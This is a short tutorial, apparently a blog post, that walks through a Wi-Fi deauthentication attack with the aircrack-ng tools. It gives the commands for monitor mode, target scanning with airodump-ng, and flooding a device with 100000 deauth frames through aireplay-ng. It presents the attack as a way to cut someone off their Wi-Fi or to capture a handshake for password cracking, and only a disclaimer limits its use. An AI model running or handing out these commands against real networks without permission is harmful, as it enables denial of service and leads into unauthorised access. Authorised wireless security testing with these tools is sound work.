Disclaimer: All content in this page is for educational purposes only. Please do not try to attack any network you don't have permission to do so.
Step 1: Identifying the target
The first step in any attack is identifying the target.
Set the Wifi Adapter in monitor mode to start reading the network traffic. Its as simple as running a couple of commands.
Bring down the Wifi adapter
ifconfig wlan0 down
Change the mode
iwconfig wlan0 mode monitor
Kill any process that might interfere
airmon-ng check kill
Bring the Wifi adapter back up
ifconfig wlan0 up
Next, we run the following to list all the networks available to identify the target network.
airodump-ng wlan0
I am not going to show the output of these requests for security reasons. We identify the BSSID of the network and the channel from the output and pass it to airodump-ng to do a targeted scan.
airodump-ng — bssid 00:00:00:00:00:00 -ch 4 wlan0
Step 2: Firing the De-auth attack
Now, we fire the de auth attack, basically we want to mimic the device connected to the network and start sending a de auth request. We spam it with a huge no of requests to deny service to the device. We don't want to do that manually so we will use a tool for the same.
aireplay-ng --deauth 100000 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0
Here, we are sending 100000 de auth requests, router mac is followed by a and device mac is followed by c. Both mac ids are taken from the output of airodump-ng.
And that’s it, we will be able to sucessfully stop a person from using their Wifi. The attack can be used for DOS(Denial of Service) or force the user to reconnect and get the handshake. This way we can build upon this attack to crack a Wifi password.